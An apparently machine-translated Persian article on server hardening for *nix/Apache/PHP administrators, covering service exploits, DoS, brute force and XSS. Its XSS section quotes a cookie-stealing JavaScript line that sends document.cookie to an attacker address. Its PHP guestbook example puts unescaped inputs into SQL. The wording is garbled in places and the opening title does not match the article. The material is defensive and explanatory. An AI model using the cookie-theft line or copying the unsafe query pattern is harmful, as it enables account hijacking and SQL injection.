استقرار حفاظت ضد ویروس از طریق Kaspersky Security Center. پیکربندی حفاظت ضد ویروس زمان بسیار زیادی دارد


در این مقاله می خواهم انواع حملات به سرورها و ابزارهای محافظت از سرور در برابر هکرها را جمع آوری کنم. کتاب ها و مقالات زیادی در مورد امنیت نوشته شده است. تاکید این مقاله بر اشتباهات اساسی مدیران و راهکارهای رفع آنها می باشد. پس از خواندن این مقاله و بررسی سرور خود، مدیر نیز نمی تواند آرام بخوابد، فقط می تواند بگوید من "حداقل نامزد" را گذرانده ام.

مدیران سه ضرب المثل را به خاطر بسپار،
نه! بهتر است آنها را چاپ کنید و در محل کار خود جلوی چشمان خود آویزان کنید:
"امنیت یک فرآیند است",
"وقتی ادمین کاری ندارد، درگیر امنیت است",
"امنیت با ضعیف ترین حلقه تعریف می شود"
هدف این مقاله ادمین های *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) و محافظت از سرورها در برابر حملات از راه دور است، برای سایر مدیران، امیدوارم مقاله منبعی برای فکر باشد.
کتاب‌های مختلف طبقه‌بندی‌های متفاوتی از حملات هکری دارند، من تقسیم‌بندی خودم را به دو کلاس شرطی از همه حملات معرفی می‌کنم، آنها را از گروه جدا می‌کنم:

  • حمله به سرویس هایی که آسیب پذیر هستند و از طریق اینترنت در دسترس هستند

برای درک تقسیم بندی من، تصور کنید یک اسکریپت تخیلی وجود دارد که از راه دور به آپاچی در پورت 80 حمله می کند و در نتیجه حمله، آپاچی خاموش می شود و شما بدون سایت خود می مانید، زیرا کسی برای ارائه صفحات وب وجود ندارد. سرور ایمیل sendmail شما 1000 کاراکتر به جای نام کاربری کوتاه به عنوان پارامتر به VRFY ارسال شد، sendmail انتظار نداشت که این اتفاق بیفتد و بسته شد و شما را بدون ایمیل گذاشت. معنای کلی حملات این کلاس شرطی این است که برخی از آسیب پذیری های برنامه مورد سوء استفاده قرار می گیرند. و سه راه وجود دارد -

  • path1) برنامه از کار می افتد و سرویس در دسترس نخواهد بود، وضعیت DoS.
  • مسیر 2) برنامه شروع به گرفتن منابع می کند و پس از اتمام آنها، DoS را انجام می دهد.
  • path3) برنامه یک Shellcode داده می شود و کد مهاجم اجرا می شود.

همه اینها حملاتی به سرویس هستند (مورد 1) و تنها به یک روش با آنها برخورد می شود: مدیر به سرعت از توسعه دهنده در مورد وجود یک آسیب پذیری مطلع می شود و این برنامه را به روز می کند.

حمله به نقطه 2 زمانی است که یک سرویس پویا پیاده سازی شده در برخی از زبان های برنامه نویسی اجازه دریافت پارامترها را می دهد و بدون بررسی آنها را اجرا می کند. به عنوان مثال، با استفاده از یک مرورگر، یک مهاجم، با خزیدن در یک سایت آپاچی، به دنبال آسیب‌پذیری‌ها در خود سایت می‌گردد و با سوءاستفاده از آنها، به آنچه می‌خواهد می‌رسد. نوشته شده در Tcl، ربات برای تعدیل کانال سرور IRC درخواست هایی را از کاربر (تعداد جوک جدید، تاریخ روز نمایش آب و هوا) و هکر دریافت می کند و کار کد برنامه ربات (مهندسی معکوس) را ایجاد می کند. )، درخواست هایی را می سازد که توسط نویسنده ربات در نظر گرفته نشده است.

بپرس چطوره؟ پس شما قطعا به این مقاله نیاز دارید. یک راه یا دیگری، درست زیر همه چیز رنگ می شود.

حمله به سرویس های آسیب پذیر و خود سرور

در این بخش، تمام حملاتی را که تاثیر آنها بر روی سیستم و سرویس‌ها می‌افتد را قرار دادم. اغلب چنین حملاتی از خطاهایی در اجرای برنامه، مانند سرریز بافر (سرریز بافر) امکان پذیر است. به طور خلاصه، به نظر می رسد اینگونه است، فرض کنید در یک سرور ftp ضعیف، یک آرایه (بافر) برای نام کاربری برای تعداد مشخصی کاراکتر (مثلاً 10) وجود دارد، و چنین سرور ftp 100 کاراکتر از یک بیمار دریافت می کند. -wisher، اگر چنین وضعیتی در کد سرور ftp بررسی شده نباشد، سرریز بافر رخ می دهد.

بنابراین، سرریز بافر محلی برای هکرها مفید است؟ امکان بازنویسی آدرس برگشتی با کد مخرب وجود دارد. از راه دور، این به شما امکان می دهد کد دلخواه را بر روی سیستم مورد نظر اجرا کنید، به صورت محلی، اگر برنامه به صورت روت اجرا شود، به شما اجازه می دهد تا امتیازات مدیر سیستم را به دست آورید. کدی که باعث سرریز بافر می شود و اقداماتی را برای هکر انجام می دهد، پوسته نامیده می شود. کد نوشتن shellcode کار آسانی نیست و نیاز به دانش زبان اسمبلی از هکر دارد که به معنای حرفه ای بودن در این زمینه است.

محافظت در برابر حملات به سرویس های آسیب پذیر و خود سرور

  • به روز رسانی. لازم است یاد بگیرید که چگونه کل سیستم را به روز کنید و بنابراین بتوانید
    "ساخت جهان و هسته" برای *nix، به روز رسانی از طریق سیستم بسته لینوکس و قادر به کلیک بر روی دکمه Update در Windows Update برای MS Windows دارای مجوز. ادمین های FreeBSD باید بتوانند نرم افزار را با استفاده از پورت ها نصب کنند. به این ترتیب شما با توسعه دهندگان حرکت خواهید کرد، نه علیه آنها.

    ادمین های MS Windows باید به فرمت توزیع MSI عادت کنند و بیشتر از آنها استفاده کنند، که به شدت توسط مایکروسافت توصیه می شود و از به روز رسانی بسته قدیمی با بسته جدید پشتیبانی می کند. هر کاری که روی سرور خود انجام می دهید، از خود بپرسید که آیا نسخه جدیدی از این برنامه وجود دارد، به روز رسانی آن چقدر آسان است؟ شما باید راه حلی ایجاد کنید که کنترل کامل روی آن داشته باشید، بله، پروژه هایی با پیشرفت ها یا وصله های خاص خود وجود دارد، اما اگر پیشرفت های شما نیاز به فریز کردن برنامه های مورد نیاز در نسخه خاصی دارد و نمی توانید وصله های خود را در سیستم جدید اعمال کنید - چنین راه حلی ارزش ندارد!

    من در اینجا یک انحراف غزلی انجام می دهم و به شما می گویم که چگونه مجبور شدم خودم را بشکنم. پس از خواندن مقالاتی در اینترنت که معمولاً اینگونه شروع می شوند، "منبع را دانلود کنید و آن را نصب کنید". بنابراین، بعدی چیست؟ چگونه نسخه جدید را نصب خواهید کرد؟ نسخه قدیمی را نگه دارید تا بتوانید در آن نصب کنید؟ و در جدید make install دوباره؟ این سوالات توسط دوستم دیمیتری دوبروین زمانی که ما شروع به یادگیری FreeBSD کردیم پرسیده شد. شروع کردم به درک درستی او و حداقل برای رایگان این مسیر مناسب نیست و با پیروی نکردن از مسیر توسعه دهندگان FreeBSD فقط کار را برای خودم سخت کردم.

    اکنون، با تسلط بر FreeBSD، هنگامی که چند دستور منابع جدید را برای هسته رایگان و کل سیستم دانلود می کنند، سپس چند دستور ایجاد می شود. دنیای جدیدو هسته، و سپس پورت ها و برنامه های کاربردی در سیستم به روز می شوند، شما شروع به درک قدرت سیستم های * nix می کنید. وقتی سروری را با FreeBSD از یک شعبه قدیمی به شعبه فعلی ارتقا می‌دهید، دنیای سیستم را بازسازی می‌کنید، زمانی که سیستم خود را از منابع جدید جمع‌آوری می‌کند (به نظر می‌رسد مونچاوزن خود را از موها کشیده است) و همه چیز، بیان غروری که احساس می‌کنید سخت است. که قبل از ارتقا کار می کرد، "بدون فایل" نیز کار می کند.

    همانطور که قبلاً فهمیدید، باید در لیست های پستی امنیتی توسعه دهندگان نرم افزاری که از کسب و کار شما پشتیبانی می کند مشترک شوید و به طور دوره ای به روز شوید. تجدید همه چیز و همه چیز باید کامل شود و روی ریل قرار گیرد.

  • تنظیم امنیتی. اکثر سیستم عامل های سرور به طور پیش فرض به اندازه کافی پیکربندی نشده اند تا در محیط سخت "شیمیایی" اینترنت کار کنند. برای اینکه هکرها در سرور شما "تقلب نکنند"، باید تنظیمات امنیتی را انجام دهید، یعنی توصیه های سازنده سیستم عامل در مورد امنیت را بخوانید. ادمین های سیستم *nix می توانند مرد را امنیت صدا کنند و پس از خواندن توصیه های توسعه دهندگان، این افسانه را به واقعیت تبدیل کنند. اما سیستم عامل هر چه که باشد، باید پس از تنظیم امنیتی، عملکرد سرور و سرویس ها را به دقت تست کنید.
  • دیواره آتش. فایروال پیکربندی شده ای که شخصاً با استفاده از اسکنرهای پورت nmap و اسکنرهای آسیب پذیری آن را بررسی کرده اید، اگر خروجی از این برنامه ها وجود داشته باشد، آیا همه متوجه می شوید که در خطر چیست؟ هنگام راه اندازی فایروال، به یاد داشته باشید که راه هایی برای دور زدن قوانین آن وجود دارد. به عنوان مثال، یک شبکه محلی وجود دارد که توسط یک فایروال محافظت می شود، با تنظیم پرچم ممنوعیت تکه تکه شدن بسته ها، در شرایط خاصی امکان رسیدن به مقصد در شبکه محلی وجود دارد. یا یک اشتباه رایج مدیر، اعتماد بیش از حد به بسته های خروجی سرور خودش.

    تصور کن موقعیت واقعی، کد دشمن در تلاش است تا اتصال به میزبان هکر میزبان را آغاز کند و شما یک قانون فایروال دارید "همه چیز از من به اینترنت مجاز است". هنگام تنظیم قوانین فایروال، باید تصویر کامل ارتباط شبکه خدمات خود را بین آنها و مشتریان راه دور کاملاً درک کنید.

  • سیستم تشخیص نفوذ. فایروال را می توان به عنوان دیوارهای سنگی در نزدیکی قلعه یک شوالیه تصور کرد. یک بار نصب شده و داخل آن بنشینید - خشک و راحت. اما اگر کسی در حال آزمایش استحکام دیوارها از توپ باشد چه؟ شاید شما در حال حاضر نیاز به نگاه کردن به خارج از قلعه و انباشته بر روی کسی؟ برای اینکه بدانید پشت دیوارهای قلعه چه اتفاقی می افتد، آنهایی که بیرون هستند، باید یک سیستم تشخیص نفوذ (IDS) روی سرور داشته باشید. اگر شما چنین سیستمی را بر اساس بسته ای که دوست دارید دارید، پس اگر شخصی شروع به شلیک از تفنگ nmap کرد، شما آگاه خواهید شد و مهاجم نیز از "آنچه می دانید" آگاه خواهد بود.
  • تجزیه و تحلیل موقعیت های غیر استاندارد. در بسیاری از گزارش‌های سیستم، کتیبه‌های "error: not open file /etc/passwd" یا "access denied" اغلب چشمک می‌زنند. اینها زنگ‌های کوچکی هستند که در مورد برنامه‌ای با پیکربندی نادرست به صدا در می‌آیند که نمی‌تواند چیزی را بخواند، در جایی، یا شاید زنگ نباشد، اما زنگ خطری است که در مورد هکری که در نیمه راه است به صدا در می‌آید.

    در هر صورت ادمین باید از چنین مواردی آگاه باشد. برای تسهیل کار مدیر، برنامه هایی ایجاد شده است که گزارش ها را برای ظاهر عبارات جالب تجزیه و تحلیل می کند و گزارشی را از طریق پست برای مدیر ارسال می کند. چنین فرصتی را نادیده نگیرید، چنین برنامه هایی با نگهبانانی قابل مقایسه است که در مسیر مورد اعتماد بررسی می کنند، اما آیا همه طبق دستور عمل می کنند؟

  • نسخه های نرم افزار را حذف کنید. بنرها را از خدمات خود حذف کنید. نه، نه آن بنرهایی که در سایت خود نشان می دهید، بلکه آن خطوطی که برنامه های شما هنگام اتصال یا در خروجی خطا در تبریک می دهند. نیازی به درخشش با نسخه های برنامه های شما نیست، هکرها در اینترنت به دنبال برنامه های موجود می گردند که از این یا آن آسیب پذیری (اکسپلویت - سوء استفاده) توسط نسخه ها سوء استفاده می کنند.

    در اینجا هیچ راه حل واحدی وجود ندارد، به عنوان مثال، اگر برنامه خاصی را از پورت ها نصب می کنید، پس make install پاک نکنید، بنابراین بدون شما همه چیز دانلود، کامپایل و نصب می شود. بهتر است واکشی کنید. عصاره درست کن سپس به زیر شاخه فایل ها بروید و در آنجا می توانید نسخه برنامه را در سورس ها تصحیح کنید یا آن را به عنوان یکی دیگر ارسال کنید و سپس فقط نصب را تمیز کنید.

    آپاچی بسیار آموزنده است و هنوز با نسخه های سیستمی، PHP، Perl، OpenSSL می درخشد. رسوایی با مشخص کردن دستورالعمل ها در httpd.conf ServerSignature Off ServerTokens Prod غیرفعال می شود. در اینترنت می توانید برای جایگزینی بنرها با هر برنامه ای کمک بگیرید. هدف یکسان است - محروم کردن مهاجم از اطلاعات ارزشمند. با نگاهی به لیست خدماتی که از طریق اینترنت در دسترس است، از خود بپرسید که آیا اطلاعات زیادی در مورد خودش و اطلاعاتی که ذخیره می کند به شما می دهد.

    به عنوان مثال، اتصال سرور DNS می تواند "انتقال منطقه" را مجاز کند و رایانه های شما با IP و نام دامنه برای همه در دسترس خواهد بود، که بد است. سرور خود را با اسکنرهای مختلف بررسی کنید و نتایج آنها را با دقت بخوانید. هنگام تعویض بنر برنامه، به شما توصیه می کنم متن تصادفی را وارد نکنید، بلکه یک هشدار در مورد مسئولیت و اینکه اقدامات ثبت شده است را وارد کنید. از آنجایی که هنگام آزاد شدن یک هکر در دادگاه، حوادثی رخ داد، زیرا روی سرور FTP هک شده، نوشته "خوش آمدید! خوش آمدید!" وجود داشت.

  • قانون حداقل نیاز. خدمات موجود برای اینترنت را به حداقل برسانید. آنچه را که به آن نیاز ندارید غیرفعال کنید، زیرا نمی توانید موارد غیرفعال شده را هک کنید. اشتباه رایجبه عنوان مثال، هنگامی که سرور MySQL، جفت شده با آپاچی در یک دستگاه، پیکربندی شده است تا از راه دور در پورت استاندارد 3306 آن قابل دسترسی باشد. چرا؟ دستور netstat -na | را بدهید grep LISTEN و به خودتان پاسخ دهید: آیا می دانید کدام برنامه ها از کدام رابط و کدام پورت استفاده می کنند؟ آیا شما در کنترل هستید؟ خوب اگر چنین است.
  • بسیاری از رمزهای عبور قوی و متفاوت. غالباً در ویدیوهای مربوط به هک یا داستان های هکرها در مورد هک، عبارت "خوب است که ادمین یک رمز عبور برای پنل مدیریت داشته باشد که به ssh و ftp نیز می رود" چشمک می زند. امیدوارم این مربوط به شما نباشد. از این رو این قانون: رمز عبور برای سرویس های مختلف باید متفاوت و حداقل 16 کاراکتر باشد. اگر می ترسید فراموش کنید، بگذارید روی یک تکه کاغذ یادداشت شوند (در این مکان متخصصان امنیتی من را می کشند)، اما این بهتر از رمزگشایی رمز عبور شما در چند دقیقه توسط یک مهاجم از راه دور است، زیرا طول کم رمز عبور و شباهت به یک کلمه دیکشنری این امکان را فراهم کرد.

    در صورتی که سرویس ها نه به عنوان کاربران سیستم در پایگاه داده /etc/passwd، بلکه به عنوان رمزهای مجازی در پایگاه داده مسطح یا DBMS خود، مجوز استفاده از رمزهای عبور مختلف را برای سرویس های مختلف آسان کنند. رمزهای عبور را در سرورهای فایل password.txt برای همه منابعی که شما به عنوان مدیر به آنها دسترسی دارید ذخیره نکنید.

  • محدودیت. تمام سرویس های شما روی سرور باید از حساب های محدود (حساب) متفاوتی اجرا شوند و هرگز از اکانت روت اجرا نشوند. باور کنید، اگر آنها به افزایش امتیاز از یک حساب محدود به وضعیت ریشه (uid=0، gid=0) برسند، به دلیل عدم وجود حفره های شناخته شده در سیستم به روز شده خود، نجات خواهید یافت.

    ضمناً بسیاری از ادمین ها چنین چیزی را فراموش می کنند که چرا مثلاً اکانت های اجرای Apache و MySQL باید به پوسته دسترسی داشته باشند! پس از همه، این را می توان غیرفعال کرد و به جای پوسته / bin / false را مشخص کرد. خوب، صادقانه، حساب های خود را برای برنامه های سرور گزارش خود بررسی کنید و اگر اشتباه می کنم به من بگویید. در پایگاه داده های SQL خود، حساب ها را به حداقل امتیازات مورد نیاز محدود کنید. وقتی فقط SELECT فراخوانی می شود، به FILE امتیاز ندهید.

  • همه به زندان!یاد بگیرید که چگونه با sandbox (sandbox) یا زندان (jail) کار کنید و برنامه ها را در این اتاق های ایزوله اجرا کنید، این کار هک کل سرور را دشوار می کند. اگر از مجازی سازی استفاده می کنید، می توانید خدمات را در سیستم عامل های مهمان مختلف پخش کنید.
  • دفاع لایه ایممکن است چیزی را به چندین روش در مکان های مختلف ممنوع کنید - آن را انجام دهید. هرگز فکر نکنید - من آن را در اینجا، آنجا ممنوع کردم تا چیزهای اضافی را ممنوع کنم.

درباره حملات به سرویس های آسیب پذیر و خود سرور بیشتر بدانید.

  • حمله DoS (Denial of Service) - حمله ای که هدف آن از بین بردن هر منبع محدود سرور (کانال اینترنت، رم، پردازنده و غیره و غیره) است تا سرور نتواند به کاربران قانونی سرویس دهد. به بیان تصویری، تصور کنید که یک مزاحم شما را در خانه صدا زد و در تماس تلفنی سکوت کرد و این کار تمام عصر ادامه داشت. از همه اینها خسته شدی و گوشی را خاموش کردی و صبح متوجه شدی که تماس مهمی از رئیست را از دست داده ای. در اینجا یک قیاس از زندگی واقعیحملات DoS

    در زندگی واقعی، DoS اغلب به این شکل به نظر می رسد، به دلیل وجود اشکال در برنامه، استفاده از پردازنده پرش می کند و برای مدت طولانی در 100٪ باقی می ماند و مهاجم به طور دوره ای از این حفره در برنامه سوء استفاده می کند. یک برنامه ضعیف می تواند حافظه RAM را تمام کند. یا یک "بمب پستی" به شکل یک فایل به شدت فشرده در بایگانی با کاراکترهای بسیار [فضا] که برای بررسی توسط آنتی ویروس باز می شود و فایل عظیم بدون بسته بندی پارتیشن هارد دیسک روی سرور و/و سرریز می شود. باعث راه اندازی مجدد سرور شود.

    حفاظت از حمله DoS:

    • به روز رسانی برنامه ای که برای حمله DoS دستکاری می شود
    • سهمیه منابع را برای حسابی که این برنامه تحت آن اجرا می شود، تنظیم کنید. *سیستم‌های nix به شما امکان می‌دهند درصد استفاده از CPU، RAM، تعداد فرآیندهای ایجاد شده، فایل‌های باز و غیره را تنظیم کنید. و غیره
    • ورود به برنامه را تنظیم کنید و سعی کنید مهاجم-عروسکباز را پیدا کنید و او را در فایروال مسدود کنید.
    • اگر در چنین شرایطی قرار گرفتید، برنامه را طبق توصیه های توسعه دهنده، گورو، طبق مقالات موجود در اینترنت تنظیم کنید.
  • DDoS (همان DoS، اما شما از طریق چندین کامپیوتر زامبی مورد حمله قرار می گیرید که توسط
    حمله کننده). DDoS مخرب است و تنها توسط خرابکارانی استفاده می‌شود که گله‌ای از ماشین‌های زامبی دارند و برای توقف حمله یا آسیب رساندن به کسب‌وکار شما پول می‌خواهند تا کاربران، بدون دسترسی به سرور شما، به سراغ رقیب بروند. حملات DDoS توسط هکرهایی که هدفشان هک فکری سرور شماست، استفاده نمی شود، بله، بله، سرور شما یک "معمایی" است که آنها می خواهند آن را "حل کنند".

    چگونه از خود در برابر DDoS محافظت کنیم؟ اگر به توانایی‌ها و ابزارهای خود تکیه می‌کنید، با خودکار کردن کار اسکریپت‌ها، می‌توانید آدرس‌های IP را از لاگ‌های مختلف استخراج کرده و آنها را در قوانین ممنوعه فایروال وارد کنید. بنابراین، برای مثال، آیا نویسنده مقاله "آیا زندگی تحت DDoS وجود دارد" مقالات زیادی در مورد چگونگی پیکربندی آن برای به حداقل رساندن آسیب DDoS ارائه کرده است.

    محافظت در برابر حملات DDoS:

    • اگر DDoS به سمت برنامه هدایت می شود، سعی کنید در گزارش ها تفاوت بین مهاجمان و کاربران قانونی را پیدا کنید و با خودکارسازی با یک اسکریپت، آن را در قوانین فایروال به صورت انکار وارد کنید.
    • اگر DDoS به سمت سیستم هدایت می شود (به عنوان مثال، حمله به پروتکل ICMP)، با خودکار کردن با یک اسکریپت، آن را به قوانین فایروال اضافه کنید.
    • سهمیه منابع را برای حسابی که این برنامه تحت آن اجرا می شود، تنظیم کنید. * سیستم‌های nix به شما امکان می‌دهند درصد استفاده از CPU، RAM، تعداد فرآیندهای ایجاد شده، فایل‌های باز و غیره را پیکربندی کنید.
    • اگر در چنین موقعیتی قرار گرفتید، برنامه را طبق توصیه های توسعه دهنده، گورو، طبق مقالات موجود در اینترنت تنظیم کنید.
    • با ارائه دهنده بالادستی خود تماس بگیرید تا به هر طریقی که می توانند به شما کمک کنند. یک شکایت به abuse@host_of_networks_from_the_attack_domain بنویسید. این به تخریب جزئی شبکه مهاجم کمک می کند، اجازه دهید او آسیب ببیند، برای او هزینه دارد. رضایت اخلاقی را تجربه کنید.
    • mod_security را برای آپاچی بررسی کنید، این ابزار عالی برای کمک به شما در برخی شرایط است.
  • حمله رمز عبور Bruteforce در اینجا حفره های برنامه ها مقصر نیستند، آنها فقط یک جفت ورود / رمز عبور را انتخاب می کنند. کسانی که سرور را با پیکربندی ssh ترک کردند، اما فراموش کردند دسترسی از طریق ssh را از IP های خاص و با لاگین های خاص محدود کنند (دستورالعمل در ssh_config AllowUser)، باید در گزارش ها تلاش هایی را برای اعمال خشونت آمیز رمز عبور mash:password_machine دیده باشند.

    محافظت از رمز عبور Bruteforce:

    • تعداد تلاش های ناموفق برای ورود به سیستم/رمز عبور را محدود کنید
    • اگر برنامه اجازه می دهد، زمان قبل از تلاش برای ورود به سیستم / رمز عبور جدید را افزایش دهید.
    • اگر دایره باریکی از افراد باید با برنامه کار کنند، چنین قانونی ایجاد کنید و آن را محدود کنید
حمله از طریق محتوای پویا سرویس

این نوع حمله اغلب روی دسته ای از Apache + (PHP | PERL) + (MySQL | PostgreSQL) برای دنیای *nix و IIS + ASP + Microsoft SQL Server برای دنیای MS Windows با استفاده از یک مرورگر ساده رخ می دهد، اما این فقط مورد خاص، که فقط به دلیل محبوبیت وب بیشتر مورد استفاده قرار می گیرد. در این بسته، زبان های برنامه نویسی ASP، PHP، Perl، SQL هستند، بنابراین اغلب توسط هکرها برای کامپایل طرح های مخرب خود استفاده می شود.

اما مهم ترین چیزی که باید درک کرد این است که چنین رباط هایی سرویس + محتوای پویا در بالای آنهادر زبان های برنامه نویسی بسیاری وجود دارد و بنابراین همه آنها زیر اسلحه هکرها هستند. به عنوان مثال، اینجا یک لیست ناقص است:

  • وب سرور + اسکریپت های CGI
  • یک پیوند قدیمی که دیگر استفاده نمی شود - اسکریپت های Apache + PHF (یعنی P H F).
  • IIS + سرور برنامه ColdFusion
  • مکانیسم SSI (سمت سرور شامل)

در مرحله بعد، بیشتر در مورد هک های وب صحبت خواهیم کرد، اما فراموش نکنید که همه چیزهایی که در زیر توضیح داده شده است برای سایر سرویس ها + بسته های محتوای پویا صادق است. کلمات متفاوت هستند، اما اصل یکسان است. امروزه هکرها با مرورگر به وب حمله می کنند و فردا با سرویس گیرنده R علیه سرویس Z. وب سرور که خود به پایگاه داده ها و زبان های برنامه نویسی متعدد متصل است، به بستری برای حملات از این نوع تبدیل شده است.

منظور از تمام حملات از این نوع، تلاش برای بررسی سایت با استفاده از یک مرورگر برای یافتن خطا در اسکریپت هایی است که محتوای پویا (محتوای) سایت را ارائه می دهند.

از این رو نتیجه - هک کردن یک سایت از طریق حمله به وب، که در آن فقط صفحات html ایستا وجود دارد که فقط به یکدیگر اشاره می کنند، غیر ممکن است. حملات از طریق وب سایت شما زمانی اتفاق افتاد که افراد تعامل بیشتری را می خواستند و آن را از طریق زبان های برنامه نویسی و پایگاه های داده اضافه می کردند.

هکرهایی که در سایت گشت و گذار می کنند توجه ویژه ای به اسکریپت هایی دارند که هر پارامتری از آنها عبور می کند. اما اگر نویسنده اسکریپت بررسی نکند که دقیقاً چه چیزی به عنوان مقدار پارامتر ارسال شده است؟

راه حل های کلی برای ادمین از حملات به محتوای پویا سرویس (وب سایت به عنوان یک مورد خاص)

  • به روز رسانی. قبلاً در این مورد صحبت کرده ایم، اما اگر از پیشرفت های شخص ثالث (موتورهای انجمن ها، گالری ها، چت ها و غیره) استفاده می کنید، گزارش هایی در مورد آسیب پذیری ها و حفره های وصله دریافت خواهید کرد. نظر هکرها این است که اگر پورتال با امور مالی و گردش مالی آنها کار می کند، پس برای چنین پورتالی مطلوب نیست که تحولات شخص دیگری را داشته باشد، مگر برای خودشان. البته قابل درک است که توسعه موتورهای خود برای سایت توسط کدنویسانی نوشته شده است که می دانند چگونه به طور ایمن برنامه نویسی کنند و درکی از تهدیدات در اینترنت دارند.
  • غیر استاندارد باشد. در بسیاری از ابزارهای هکر، پایگاه‌های داده آسیب‌پذیری، انجمن/، گالری/، تصاویر/ مسیرها اغلب چشمک می‌زنند. خیلی راحت! ادمین را بشناسید، نیمی از آنها زمانی که سایت شما در آدرس /usr/www نیست و ادمین شما site.com/admin نیست، سایت شما را میتراشند و تف میکنند. نکته اصلی این است که اگر استاندارد نیستید، پس این یک پره اضافی در چرخ های هکری است که به سایت شما حمله می کند. او باید در پایگاه داده / اسکریپت دستی اضافه / تصحیح کند. اما آیا یک هکر همیشه قادر است یا می خواهد این کار را انجام دهد؟ هکرهای جوان "Script kiddies" قطعاً ترسیده خواهند شد. به عنوان مثال، نکات امنیتی PHP

    # کدهای PHP را مانند سایر انواع کدها به نظر برسانید
    AddType application/x-httpd-php .asp .py .pl
    # کد PHP را شبیه کدهای نوع ناشناخته کنید
    برنامه AddType/x-httpd-php .bop .foo .133t
    # کد PHP را شبیه به html کنید
    برنامه AddType/x-httpd-php .html .htm

    این شکل از امنیت برای PHP از طریق مخفی کردن دارای جنبه های منفی کمی با هزینه اندک است. خود هکرها با توصیف هک های خود می نویسند که همان نرم افزاری را که روی سرور شما قرار دارد از سایت توسعه دهنده دانلود می کنند و نگاه می کنند که با چه نام های / مسیرهای / این یا آن موتور پیش فرض جدول کار می کند. معنای کلی غیر استاندارد این است که فرآیند هک را به تعویق بیندازید تا هکر "بلیتزکریگ" نداشته باشد و هر چه بیشتر بکشد احتمال شناسایی آن بیشتر می شود.

  • نسخه های موتورها و اسکریپت های سایت را حذف کنید. این اطلاعات ارزشمندی است که مهاجم باید از دانستن نسخه مورد نظر خود محروم باشد. راه حل های کلید در دستبرای هک کردن آن را طوری تنظیم کنید که اسکریپت های شما خطاها را روی خطاها نشان ندهند اطلاعات مفیدمانند: مسیر اسکریپت که در آن خطا رخ داده است (مشکل "مشکل مسیر") و خروجی خود خطا.
  • نیاز به .htaccess را در نظر بگیرید. وجود فایل‌های .htaccess به این معنی است که می‌توانید گزینه‌های خود را که در پیکربندی اصلی آپاچی تنظیم شده است، لغو کنید، باور کنید، هکرها دقیقاً این کار را انجام خواهند داد. اگر استفاده از htaccess. را با دستور "AllowOverride None" غیرفعال کنید، یک مزیت عملکرد برای Apache دریافت خواهید کرد، زیرا در هر درخواست تمام دایرکتوری های موجود در مسیر صفحه وب را بررسی نمی کند و امنیت آن را افزایش می دهد. وب سرور آپاچی

اطلاعات بیشتر در مورد حملات به محتوای پویا (وب سایت به عنوان یک مورد خاص)

  • XSS (Cross Site Scripting).
    اسکریپت نویسی بین سایتی XSS نامیده می شود، نه CSS، زیرا CSS مخفف اولیه "Cascading Style Sheets" است. حملات XSS علیه سرور نیست، بلکه علیه کاربران آن سرور است. اما ادمین نیازی به شادی ندارد! یک حمله XSS به این شکل است، سایت دارای فیلدهای قابل ویرایش در صفحه وب یا پارامترهای اسکریپت است که توسط جاوا اسکریپت فیلتر نمی شوند.

    هکر کدهایی را به زبان برنامه نویسی سمت کلاینت، معمولاً جاوا و VBScript، به فیلدهای قابل ویرایش اضافه می کند و این کد بخشی از صفحه HTML می شود. هنگامی که کاربر از چنین صفحه ای بازدید می کند، مرورگر آن صفحه را تجزیه می کند و این کد را اجرا می کند.
    هکرها با XSS چه می کنند؟

    • سرقت کوکی ها (کوکی ها، نان ها) - این فایل های متنی اطلاعاتی را ذخیره می کنند که سرور برای شناسایی بعدی کاربر در اختیار کاربر قرار می دهد. در مثال، اگر یک فایل test.html با این محتوا ایجاد کنید (آن را خودتان بنویسید)، پس از اجرا در یک مرورگر، خروجی XSS خواهد داشت.
      ادمین عزیز در بازدید از سایت با خطا مواجه شدم
      کمک

      اما می توانید یک اسکریپت در جاوا بنویسید. document.location="آدرس گیرنده کوکی"+document.cookie. به طور معمول، چنین اسکریپت هایی در ایمیل مدیر نوشته می شوند و با استفاده از مهندسی اجتماعی، سعی می کنند او را وادار کنند که پیام را بخواند تا کوکی های خود را دریافت کند.

      اگر پیوندی به آدرس IP و اقدامات امنیتی اضافی در کوکی ها وجود نداشته باشد، کوکی های خود را با کوکی های مدیریت جایگزین می کنند و سعی می کنند وارد پنل مدیریت شوند که ورود و رمز عبور را بررسی نمی کند و افراد را فقط با کوکی ها شناسایی می کند.

    • تغییر شکل سایت (deface - جایگزینی صفحه شروع سایت، اغلب index.html)
    • تروجان سازی یک کاربر راه دور اکسپلویت های تازه برای مرورگرهای کاربران انتخاب می شوند و زمانی که آنها وارد یک صفحه آسیب پذیر می شوند، سعی می شود کامپیوتر را با یک تروجان آلوده کنند. اگر کاربر یک آنتی ویروس با پایگاه داده های تازه نصب شده داشته باشد، ظاهر یک تروجان را در سیستم نشان می دهد. و سایت شما به چشم کاربر می افتد، شاید دیگر به سراغ شما نیاید.
    • DoS. با تعداد زیادی بازدیدکننده، اسکریپت علاوه بر این، صفحات دیگری را از سرور شما یا از دیگری درخواست می‌کند، ممکن است شخصی دارای DoS باشد.

    راه حل مشکل:

    • برای جلوگیری از نوشتن تگ های html در پایگاه داده از فیلدهای ورودی، از ساختارهایی مانند htmlspecialchars برای PHP استفاده کنید که جایگزین خواهد شد.< на на >، & به & و غیره
      مثال،

      $comment = htmlspecialchars($comment, ENT_QUOTES);
      $query = "insert into guestbook
      مقادیر (نام، مکان، ایمیل، آدرس اینترنتی، نظر).
      ("$name"، "$location"، "$email"، "$url"، "$comment")"؛
      mysql_query ($query) یا die(mysql_error());

    • تمام پارامترهایی که کاربر وارد می کند و از طریق نوار آدرس به اسکریپت ارسال می شود را در اسکریپت های خود بررسی و فیلتر کنید. نحوه استفاده صحیح از عبارات منظم برای تجزیه داده های ورودی را بیاموزید. برای زبان برنامه نویسی خود، مطالبی را پیدا کنید که به شما یاد می دهد چگونه ایمن کدنویسی کنید.
    • اگر می خواهید از فناوری کوکی در سایت خود استفاده کنید، لطفاً اقدامات امنیتی کوکی ما را بخوانید. اقدامات آنها را در زمان و با آدرس های IP محدود کنید.
    • به عنوان یک ادمین، زمانی که توسط مهندسی اجتماعی مورد کلاهبرداری قرار می گیرید، مراقب باشید. امنیت رایانه شخصی پشت رایانه مشتری خود را فراموش نکنید.
  • تزریق SQL. تزریق SQL.
